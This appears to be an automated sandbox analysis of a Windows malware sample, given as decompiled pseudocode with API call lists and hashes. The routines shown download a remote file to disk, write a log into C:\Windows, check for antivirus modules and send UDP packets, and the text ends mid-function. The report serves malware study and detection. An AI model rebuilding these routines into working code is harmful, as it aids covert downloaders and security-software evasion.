                                  • Part of subcall function 0220A677: GetTickCount.KERNEL32 ref: 0220A6C5
                                  • Part of subcall function 0220A677: GetTickCount.KERNEL32 ref: 0220A6E6
                                  • Part of subcall function 0220A677: lstrlen.KERNEL32(?,022026B8,00000000), ref: 0220A6F8
                                  • Part of subcall function 0220A677: wsprintfA.USER32 ref: 0220A704
                                • InternetOpenA.WININET(02202120,00000001,00000000,00000000,00000000), ref: 02210A18
                                • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 02210A4A
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 02210A7F
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 02210AA5
                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02210AED
                                • CloseHandle.KERNEL32(?), ref: 02210B5D
                                • InternetCloseHandle.WININET(?), ref: 02210B73
                                • InternetCloseHandle.WININET(?), ref: 02210B89
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                • String ID:
                                • API String ID: 999627789-0
                                • Opcode ID: 70535407128e2dbb5948de73c48c61ab855ca9e361797f54c8d0906ab418b9ce
                                • Instruction ID: b200fe54645168f23c139d260aa5dd67525ea3f8726ea6c5a2994c26313421bd
                                • Opcode Fuzzy Hash: 70535407128e2dbb5948de73c48c61ab855ca9e361797f54c8d0906ab418b9ce
                                • Instruction Fuzzy Hash: 77516B71A50619EBDB34CFA4DC58FEAB7B5AB1430AF0045E9E609A61C0DBB45BC4CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 56%
                                			E022054A2(void* _a4) {
                                				void _v263;
                                				char _v264;
                                				void _v523;
                                				char _v524;
                                				void* _v528;
                                				long _v532;
                                				long _v536;
                                				void* _t30;
                                
                                				_v536 = 0;
                                				_v532 = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				asm("stosb");
                                				_v524 = 0;
                                				memset( &_v523, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_t30 = CreateFileA("C:\\Windows\\lvgdvj.log", 0x40000000, 2, 0, "true", 0x80, 0);
                                				_v528 = _t30;
                                				if(_v528 != 0xffffffff) {
                                					_v532 =  *_a4 + 8;
                                					 *0x21e1148( &_v524, "C:\\Windows\\lvgdvj.log");
                                					E022042EC( &_v524,  *0x21e114c( &_v264),  &_v524);
                                					E022043C5(_a4, _v532,  &_v264);
                                					WriteFile(_v528, _a4, _v532,  &_v536, 0);
                                					SetEndOfFile(_v528);
                                					return CloseHandle(_v528);
                                				}
                                				return _t30;
                                			}











                                0x022054ac
                                0x022054b6
                                0x022054c0
                                0x022054d4
                                0x022054d6
                                0x022054d7
                                0x022054eb
                                0x022054ed
                                0x022054ef
                                0x02205507
                                0x0220550d
                                0x0220551a
                                0x02205528
                                0x0220553a
                                0x0220555c
                                0x02205576
                                0x02205599
                                0x022055a6
                                0x00000000
                                0x022055b3
                                0x022055bd

                                APIs
                                • CreateFileA.KERNEL32(C:\Windows\lvgdvj.log,40000000,00000002,00000000,?,00000080,00000000,?), ref: 02205507
                                • lstrcpy.KERNEL32(00000000,C:\Windows\lvgdvj.log), ref: 0220553A
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0220554E
                                • WriteFile.KERNEL32(000000FF,02206958,00000000,?,00000000), ref: 02205599
                                • SetEndOfFile.KERNEL32(000000FF), ref: 022055A6
                                • CloseHandle.KERNEL32(000000FF), ref: 022055B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$CloseCreateHandleWritelstrcpylstrlen
                                • String ID: C:\Windows\lvgdvj.log
                                • API String ID: 3630773104-2229539412
                                • Opcode ID: c8ab4224977cdede527062db996af1e1e09c853aca5fc2b47f4f8720f489874e
                                • Instruction ID: 8057bb761d6e5428e0e7cabbdc76b9b607152986cbee5efaee44a3d0319064d4
                                • Opcode Fuzzy Hash: c8ab4224977cdede527062db996af1e1e09c853aca5fc2b47f4f8720f489874e
                                • Instruction Fuzzy Hash: AC3175B5940318ABDB20DBA4DC4DFDA77B9AB58700F0046D4E21DA7281DBB45EC48F90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 91%
                                			E02209B56(int _a4) {
                                				char _v520;
                                				intOrPtr _v524;
                                				void _v548;
                                				void* _v552;
                                				char _v556;
                                				void* _v560;
                                				void _v819;
                                				char _v820;
                                				void* _t35;
                                				void* _t36;
                                				void* _t51;
                                				void* _t53;
                                				void* _t54;
                                
                                				_v552 = 0;
                                				memset( &_v548, 0, 0x88 << 2);
                                				_v556 = 0;
                                				_v820 = 0;
                                				memset( &_v819, 0, 0x40 << 2);
                                				_t53 = _t51 + 0x18;
                                				asm("stosw");
                                				asm("stosb");
                                				_v560 = CreateToolhelp32Snapshot(8, _a4);
                                				_v552 = 0x224;
                                				if(Module32First(_v560,  &_v552) != 0) {
                                					do {
                                						if(_v524 == 0) {
                                							goto L5;
                                						} else {
                                							CharUpperA( &_v520);
                                							_t35 = E02208DEB( &_v520, "DWEBLLIO");
                                							_t54 = _t53 + 8;
                                							if(_t35 != 0) {
                                								L4:
                                								_v556 = 1;
                                							} else {
                                								_t36 = E02208DEB( &_v520, "DWEBIO");
                                								_t53 = _t54 + 8;
                                								if(_t36 == 0) {
                                									goto L5;
                                								} else {
                                									goto L4;
                                								}
                                							}
                                						}
                                						goto L6;
                                						L5:
                                					} while (Module32Next(_v560,  &_v552) != 0);
                                				}
                                				L6:
                                				CloseHandle(_v560);
                                				return _v556;
                                			}
















                                0x02209b60
                                0x02209b77
                                0x02209b79
                                0x02209b83
                                0x02209b97
                                0x02209b97
                                0x02209b99
                                0x02209b9b
                                0x02209ba7
                                0x02209bad
                                0x02209bcc
                                0x02209bce
                                0x02209bd5
                                0x00000000
                                0x02209bd7
                                0x02209bde
                                0x02209bf0
                                0x02209bf5
                                0x02209bfa
                                0x02209c14
                                0x02209c14
                                0x02209bfc
                                0x02209c08
                                0x02209c0d
                                0x02209c12
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02209c12
                                0x02209bfa
                                0x00000000
                                0x02209c20
                                0x02209c33
                                0x02209bce
                                0x02209c37
                                0x02209c3e
                                0x02209c4e

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02209BA2
                                • Module32First.KERNEL32(?,00000224), ref: 02209BC5
                                • CharUpperA.USER32(?,00000008,?,?), ref: 02209BDE
                                • Module32Next.KERNEL32(?,00000224), ref: 02209C2E
                                • CloseHandle.KERNEL32(?,00000008,?,?), ref: 02209C3E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Module32$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
                                • String ID: DWEBIO$DWEBLLIO
                                • API String ID: 3788218250-3981995823
                                • Opcode ID: 8b811c5fb1ab6ca3e57ecae797ad78fb369ef39a5e84f5a62f05b2bba91b0ca6
                                • Instruction ID: ea347720e77ba84f5384c36fa4360effdb02072aa18c5b96f34c2d1f8ee3dc22
                                • Opcode Fuzzy Hash: 8b811c5fb1ab6ca3e57ecae797ad78fb369ef39a5e84f5a62f05b2bba91b0ca6
                                • Instruction Fuzzy Hash: 51219271910319ABEB20EBE4DC88B9AB3F9AB0C700F0045D9E609A2186DB75DAC4CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 49%
                                			E0220777D(void* _a4) {
                                				char _v8;
                                				short _v12;
                                				intOrPtr _v16;
                                				void* _v20;
                                				char _v24;
                                				short _v26;
                                				short _v30;
                                				short _v34;
                                				intOrPtr _v36;
                                				short _v38;
                                				char _v40;
                                				signed int _t98;
                                				intOrPtr _t103;
                                				intOrPtr _t114;
                                				intOrPtr _t122;
                                				void* _t125;
                                				intOrPtr _t142;
                                				intOrPtr _t143;
                                				intOrPtr _t149;
                                				intOrPtr _t174;
                                				void* _t186;
                                				void* _t188;
                                
                                				_v20 = _a4;
                                				_v16 = _v20 + 0x10;
                                				_v12 = 0;
                                				_v8 = 0;
                                				if(0 < 0x400) {
                                					_push(1);
                                					E022062DB(_v16, 0);
                                					_t98 = E022040A6(_v16 + 4,  *((intOrPtr*)(_v16 + 2)));
                                					_t188 = _t186 + 0x14;
                                					if(0 == (_t98 & 0x0000ffff) &&  *((char*)(_v16 + 4)) == 4) {
                                						_v8 =  *((intOrPtr*)(_v16 + 5));
                                						_t142 = _v16;
                                						_t199 =  *((char*)(_t142 + 9)) - 1;
                                						if( *((char*)(_t142 + 9)) != 1) {
                                							__eflags =  *((char*)(_v16 + 9)) - 2;
                                							if(__eflags != 0) {
                                								_t143 = _v16;
                                								__eflags =  *((char*)(_t143 + 9)) - 3;
                                								if( *((char*)(_t143 + 9)) == 3) {
                                									_t103 = _v16;
                                									__eflags =  *((char*)(_t103 + 0xc)) - 0xfffffffe;
                                									if( *((char*)(_t103 + 0xc)) == 0xfffffffe) {
                                										_t174 = _v16;
                                										__eflags =  *((char*)(_t174 + 0xd)) - 0xfffffffe;
                                										if( *((char*)(_t174 + 0xd)) == 0xfffffffe) {
                                											_t149 = _v16;
                                											__eflags =  *((char*)(_t149 + 0xe)) - 0xfffffffe;
                                											if( *((char*)(_t149 + 0xe)) == 0xfffffffe) {
                                												_t114 = _v16;
                                												_t150 =  *((char*)(_t114 + 0xf));
                                												__eflags =  *((char*)(_t114 + 0xf)) - 0xfffffffe;
                                												if( *((char*)(_t114 + 0xf)) == 0xfffffffe) {
                                													__eflags = _v16 + 0x14;
                                													E02206330(_t150, _v16 + 0x14, _v16 + 0x14, 0);
                                													_t188 = _t188 + 8;
                                												}
                                											}
                                										}
                                									}
                                									__eflags = _v8 -  *0x2287da0; // 0x54
                                									if(__eflags < 0) {
                                										_v12 = E02206981(_v16, __eflags, _v16, 0x23, 1, 0);
                                										__eflags = _v12;
                                										if(_v12 != 0) {
                                											 *0x21e11ac( *((intOrPtr*)(_v20 + 0x1014)), _v16, _v12, 0, _v20, 0x10);
                                										}
                                									} else {
                                										_v12 = E02206981(_v16, __eflags, _v16, 3, 1, 0);
                                										__eflags = _v12;
                                										if(_v12 != 0) {
                                											 *0x21e11ac( *((intOrPtr*)(_v20 + 0x1014)), _v16, _v12, 0, _v20, 0x10);
                                										}
                                									}
                                								}
                                							} else {
                                								_v12 = E02206981(_v16, __eflags, _v16, 2, 1, 0);
                                								__eflags = _v12;
                                								if(_v12 != 0) {
                                									 *0x21e11ac( *((intOrPtr*)(_v20 + 0x1014)), _v16, _v12, 0, _v20, 0x10);
                                								}
                                							}
                                						} else {
                                							_v40 = 0;
                                							_v38 = 0;
                                							_v34 = 0;
                                							_v30 = 0;
                                							_v26 = 0;
                                							_v24 = 0;
                                							E0221772B( &_v40, _v20, 0x10);
                                							_t122 = _v16;
                                							_t154 =  *((intOrPtr*)(_t122 + 0xe));
                                							_v38 =  *0x21e11b8( *((intOrPtr*)(_t122 + 0xe)));
                                							_t125 = E0220719B( *((intOrPtr*)(_t122 + 0xe)), _t199,  &_v40,  &_v8, 0, 0);
                                							_t200 = _t125;
                                							if(_t125 == 0) {
                                								_v12 = E02206981(_t154, __eflags, _v16, 1, 2, 0);
                                							} else {
                                								_v12 = E02206981( &_v24, _t200, _v16, 1, 1,  &_v24);
                                							}
                                							if(_v12 > 0) {
                                								 *0x21e11ac( *((intOrPtr*)(_v20 + 0x1014)), _v16, _v12, 0, _v20, 0x10);
                                							}
                                							if(_v24 != 0) {
                                								E02205E86(_v36,  *0x21e11b4(1) & 0x0000ffff, _v38, 0x103664a);
                                							}
                                						}
                                					}
                                				}
                                				GlobalFree(_a4);
                                				_push(0);
                                				RtlExitUserThread();
                                				return 0;
                                			}

























                                0x02207787
                                0x02207790
                                0x02207793
                                0x0220779a
                                0x022077af
                                0x022077b5
                                0x022077c5
                                0x022077e6
                                0x022077eb
                                0x022077f5
                                0x02207811
                                0x02207814
                                0x0220781b
                                0x0220781e
                                0x02207906
                                0x02207909
                                0x0220794b
                                0x02207952
                                0x02207955
                                0x0220795b
                                0x02207962
                                0x02207965
                                0x02207967
                                0x0220796e
                                0x02207971
                                0x02207973
                                0x0220797a
                                0x0220797d
                                0x0220797f
                                0x02207982
                                0x02207986
                                0x02207989
                                0x02207990
                                0x02207994
                                0x02207999
                                0x02207999
                                0x02207989
                                0x0220797d
                                0x02207971
                                0x0220799f
                                0x022079a5
                                0x022079f6
                                0x022079f9
                                0x022079fd
                                0x02207a19
                                0x02207a19
                                0x022079a7
                                0x022079b9
                                0x022079bc
                                0x022079c0
                                0x022079dc
                                0x022079dc
                                0x022079e2
                                0x022079a5
                                0x0220790b
                                0x0220791d
                                0x02207920
                                0x02207924
                                0x02207940
                                0x02207940
                                0x02207946
                                0x02207824
                                0x02207824
                                0x0220782c
                                0x0220782f
                                0x02207832
                                0x02207835
                                0x02207839
                                0x0220784a
                                0x02207852
                                0x02207855
                                0x02207860
                                0x02207870
                                0x02207878
                                0x0220787a
                                0x022078a7
                                0x0220787c
                                0x02207890
                                0x02207890
                                0x022078ae
                                0x022078ca
                                0x022078ca
                                0x022078d4
                                0x022078f2
                                0x022078f7
                                0x022078fa
                                0x0220781e
                                0x022077f5
                                0x02207a23
                                0x02207a29
                                0x02207a2b
                                0x02207a37

                                APIs
                                • htons.WS2_32(?), ref: 0220785A
                                  • Part of subcall function 0220719B: socket.WS2_32(00000002,00000002,00000011), ref: 02207203
                                  • Part of subcall function 0220719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0220726D
                                  • Part of subcall function 0220719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 02207345
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 022078CA
                                • htons.WS2_32(?), ref: 022078E2
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02207940
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 022079DC
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02207A19
                                  • Part of subcall function 02206330: RtlEnterCriticalSection.NTDLL(02219050), ref: 022063CD
                                  • Part of subcall function 02206330: RtlLeaveCriticalSection.NTDLL(02219050), ref: 02206960
                                • GlobalFree.KERNEL32(00000000), ref: 02207A23
                                • RtlExitUserThread.NTDLL(00000000), ref: 02207A2B
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: sendto$CriticalSectionhtons$EnterExitFreeGlobalLeaveThreadUserselectsocket
                                • String ID:
                                • API String ID: 4130859867-0
                                • Opcode ID: b7e41a99c0c2a6bab7abe1199f25e61be0f3b3379fd617bee15219bdd9d1c34b
                                • Instruction ID: 22c58305943cbf22b2591e1c75f9bd52954ec7d2132cb73eecd57d6733202f19
                                • Opcode Fuzzy Hash: b7e41a99c0c2a6bab7abe1199f25e61be0f3b3379fd617bee15219bdd9d1c34b
                                • Instruction Fuzzy Hash: BE916A71E10209AFEB14DBE4CC85FEEF7B6AF48700F148598E615AB2C6D775AA40CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E02212C88(intOrPtr __ecx) {
                                				signed int _t58;
                                				signed int _t64;
                                				signed int _t66;
                                				void* _t72;
                                				signed int _t75;
                                				signed int _t80;
                                				void* _t116;
                                				void* _t118;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					_t93 = __ecx;
                                					 *(_t116 - 0x124) =  *(_t116 - 0x124) + 1;
                                					if( *(_t116 - 0x124) >= 0x1e) {
                                						break;
                                					}
                                					L2:
                                					_t64 = E022044CB(__ecx) & 3;
                                					if(_t64 < 0) {
                                						_t64 = (_t64 - 0x00000001 | 0xfffffffc) + 1;
                                					}
                                					 *(_t116 - 0x128) = _t64;
                                					if( *(_t116 - 0x124) > 0x14) {
                                						_t93 = 5;
                                						 *(_t116 - 0x128) =  *(_t116 - 0x124) % 5;
                                					}
                                					if( *((intOrPtr*)(_t116 +  *(_t116 - 0x128) * 4 - 0x18)) != 0) {
                                						_t66 = E022044CB(_t93) & 0x0000ffff;
                                						asm("cdq");
                                						_t129 = _t66 % 0x67 - 0xa;
                                						if(_t66 % 0x67 > 0xa) {
                                							E02212A35(_t129,  *((intOrPtr*)(_t116 + 8)));
                                							_t118 = _t118 + 4;
                                						}
                                						 *0x21e1148(_t116 - 0x11c,  *((intOrPtr*)(_t116 +  *(_t116 - 0x128) * 4 - 0x18)));
                                						 *((intOrPtr*)(_t116 +  *(_t116 - 0x128) * 4 - 0x18)) = 0;
                                						_t97 = _t116 - 0x11c;
                                						E02212962(_t116 - 0x11c, _t116 - 0x11c);
                                						_t72 = E02208DEB(_t116 - 0x11c, 0x2203df8);
                                						_t118 = _t118 + 0xc;
                                						if(_t72 == 0) {
                                							_t75 = E022044CB(_t97);
                                							asm("cdq");
                                							if((_t75 & 0x0000ffff) % 0x65 > 0x32) {
                                								 *0x21e106c(_t116 - 0x11c, 0x2203dfc);
                                							}
                                							 *0x21e106c(_t116 - 0x11c, 0x2203e00);
                                							_t80 = E022044CB(0x65);
                                							asm("cdq");
                                							if((_t80 & 0x0000ffff) % 0x66 > 0x32) {
                                								 *0x21e106c(_t116 - 0x11c, 0x2203e04);
                                							}
                                							wsprintfA(_t116 +  *0x21e114c(_t116 - 0x11c, "%s",  *((intOrPtr*)(_t116 + 0xc))) - 0x11c);
                                							_t118 = _t118 + 0xc;
                                						}
                                						_t93 =  *((intOrPtr*)(_t116 + 8));
                                						 *0x21e106c( *((intOrPtr*)(_t116 + 8)), _t116 - 0x11c);
                                					}
                                				}
                                				L17:
                                				_t58 = E022044CB(__ecx) & 0x0000ffff;
                                				asm("cdq");
                                				_t133 = _t58 % 0x63 - 0x3c;
                                				if(_t58 % 0x63 > 0x3c) {
                                					E02212A35(_t133,  *((intOrPtr*)(_t116 + 8)));
                                				}
                                				return  *((intOrPtr*)(_t116 - 0x120));
                                			}











                                0x02212c88
                                0x02212c88
                                0x02212c88
                                0x02212c88
                                0x02212c91
                                0x02212c9e
                                0x00000000
                                0x00000000
                                0x02212ca4
                                0x02212cae
                                0x02212cb3
                                0x02212cb9
                                0x02212cb9
                                0x02212cba
                                0x02212cc7
                                0x02212cd1
                                0x02212cd8
                                0x02212cd8
                                0x02212ce9
                                0x02212cf4
                                0x02212cf9
                                0x02212d01
                                0x02212d04
                                0x02212d0a
                                0x02212d0f
                                0x02212d0f
                                0x02212d24
                                0x02212d30
                                0x02212d38
                                0x02212d3f
                                0x02212d53
                                0x02212d58
                                0x02212d5d
                                0x02212d63
                                0x02212d6d
                                0x02212d78
                                0x02212d86
                                0x02212d86
                                0x02212d98
                                0x02212d9e
                                0x02212da8
                                0x02212db3
                                0x02212dc1
                                0x02212dc1
                                0x02212de5
                                0x02212deb
                                0x02212deb
                                0x02212df5
                                0x02212df9
                                0x02212df9
                                0x02212dff
                                0x02212e04
                                0x02212e09
                                0x02212e0e
                                0x02212e16
                                0x02212e19
                                0x02212e1f
                                0x02212e24
                                0x02212e31

                                APIs
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02212D24
                                • lstrcat.KERNEL32(00000000,02203DFC), ref: 02212D86
                                • lstrcat.KERNEL32(00000000,02203E00), ref: 02212D98
                                • lstrcat.KERNEL32(00000000,02203E04), ref: 02212DC1
                                • lstrlen.KERNEL32(00000000,%s,02213658,?,?,?,?,?,?), ref: 02212DD7
                                • wsprintfA.USER32 ref: 02212DE5
                                • lstrcat.KERNEL32(?,00000000), ref: 02212DF9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
                                • String ID: %s
                                • API String ID: 3923932729-3043279178
                                • Opcode ID: ab96d2165536d6e2b5facde9c99a77a44e8b2790fa1126fe82003fcdb50beb7a
                                • Instruction ID: aab3dd851469b7678f063ea09173b1b9ff7b42e5a077b01f4e0eb7f154a11a55
                                • Opcode Fuzzy Hash: ab96d2165536d6e2b5facde9c99a77a44e8b2790fa1126fe82003fcdb50beb7a
                                • Instruction Fuzzy Hash: 1B31DA75960228DBDB24DBE4DC85BE933F69F58300F1086E4F609D2184D7349AD4CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E0220A677(void* __eflags, intOrPtr _a4) {
                                				intOrPtr _t16;
                                				void* _t17;
                                				signed int _t20;
                                				signed int _t21;
                                				signed int _t28;
                                				signed int _t29;
                                				intOrPtr _t44;
                                				intOrPtr _t47;
                                				intOrPtr _t50;
                                
                                				_t16 =  *0x21e17d0; // 0x2202684
                                				_t17 = E02208DEB(_a4, _t16);
                                				if(_t17 != 0) {
                                					_t44 =  *0x21e1828; // 0x2202738
                                					_t17 = E02208DEB(_a4, _t44);
                                					if(_t17 == 0) {
                                						_t37 = _a4;
                                						if(E02208DEB(_a4, "?") == 0) {
                                							_t20 = GetTickCount();
                                							_t21 = E022044CB(_t37);
                                							asm("cdq");
                                							_t47 =  *0x21e17e0; // 0x22026b0
                                							return wsprintfA(_a4 +  *0x21e114c(_a4, _t47, GetTickCount(), _t20 * ((_t21 & 0x0000ffff) % 0xa + 1)));
                                						}
                                						_t28 = GetTickCount();
                                						_t29 = E022044CB(_t37);
                                						asm("cdq");
                                						_t50 =  *0x21e17e4; // 0x22026b8
                                						return wsprintfA(_a4 +  *0x21e114c(_a4, _t50, GetTickCount(), _t28 * ((_t29 & 0x0000ffff) % 0xa + 1)));
                                					}
                                				}
                                				return _t17;
                                			}












                                0x0220a67b
                                0x0220a685
                                0x0220a68f
                                0x0220a695
                                0x0220a6a0
                                0x0220a6aa
                                0x0220a6b5
                                0x0220a6c3
                                0x0220a70f
                                0x0220a717
                                0x0220a721
                                0x0220a737
                                0x00000000
                                0x0220a754
                                0x0220a6c5
                                0x0220a6cd
                                0x0220a6d7
                                0x0220a6ed
                                0x00000000
                                0x0220a70a
                                0x0220a6aa
                                0x0220a759

                                APIs
                                • GetTickCount.KERNEL32 ref: 0220A6E6
                                • lstrlen.KERNEL32(?,022026B8,00000000), ref: 0220A6F8
                                • wsprintfA.USER32 ref: 0220A704
                                • GetTickCount.KERNEL32 ref: 0220A6C5
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • GetTickCount.KERNEL32 ref: 0220A70F
                                • GetTickCount.KERNEL32 ref: 0220A730
                                • lstrlen.KERNEL32(?,022026B0,00000000), ref: 0220A742
                                • wsprintfA.USER32 ref: 0220A74E
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CountTick$lstrlenwsprintf$ExchangeInterlocked
                                • String ID:
                                • API String ID: 2702386088-0
                                • Opcode ID: b51f21e343c6cabde16e9234386ec0a582988f5aba6fdfcd743c171acf010c52
                                • Instruction ID: 14853879b5b0ac67fe15810ab733874a18a71537d334d2251a859dd0418fff05
                                • Opcode Fuzzy Hash: b51f21e343c6cabde16e9234386ec0a582988f5aba6fdfcd743c171acf010c52
                                • Instruction Fuzzy Hash: 8C21A476A50200BBDB04ABF4DC45EEB37E9DF48341B048929FA0DC7285D635EDA0CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTempPathA.KERNEL32(00000080,02213015,?), ref: 0220A78C
                                • lstrlen.KERNEL32(02213015), ref: 0220A796
                                • lstrcat.KERNEL32(02213015,02203CC0), ref: 0220A7B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0220A7CF
                                • lstrlen.KERNEL32(02213015,02202880,00000000), ref: 0220A7FD
                                • wsprintfA.USER32 ref: 0220A809
                                • lstrlen.KERNEL32(02213015,0220288C,00000000), ref: 0220A826
                                • wsprintfA.USER32 ref: 0220A832
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                • String ID:
                                • API String ID: 2776683041-0
                                • Opcode ID: 1e7cf682dbad3f0ea8e447ed9246f8bcf6cab9450c9a8faf88aaabd4bf32a83b
                                • Instruction ID: 80336fac7075ac33a8a0d0d8700cd453626952892e013dbbb24be59faa18b7c2
                                • Opcode Fuzzy Hash: 1e7cf682dbad3f0ea8e447ed9246f8bcf6cab9450c9a8faf88aaabd4bf32a83b
                                • Instruction Fuzzy Hash: 062188B9550104FBDB04DBA4DC84FEB77B9AB49704F408554FB0E9A245DA749DD0CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 54%
                                			E00427AA6(signed int __eax, void* __ebx, intOrPtr __ecx, signed int __edx, int __edi) {
                                				signed char _t32;
                                				intOrPtr _t34;
                                				signed int _t40;
                                				intOrPtr _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t45;
                                				signed char _t47;
                                				intOrPtr* _t50;
                                				signed int _t53;
                                				intOrPtr _t55;
                                				int _t60;
                                				void* _t62;
                                				intOrPtr* _t63;
                                				void* _t65;
                                				signed int _t66;
                                				void* _t68;
                                				intOrPtr _t69;
                                				void* _t72;
                                
                                				_t60 = __edi;
                                				_t59 = __edx;
                                				_t55 = __ecx;
                                				_t32 = __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
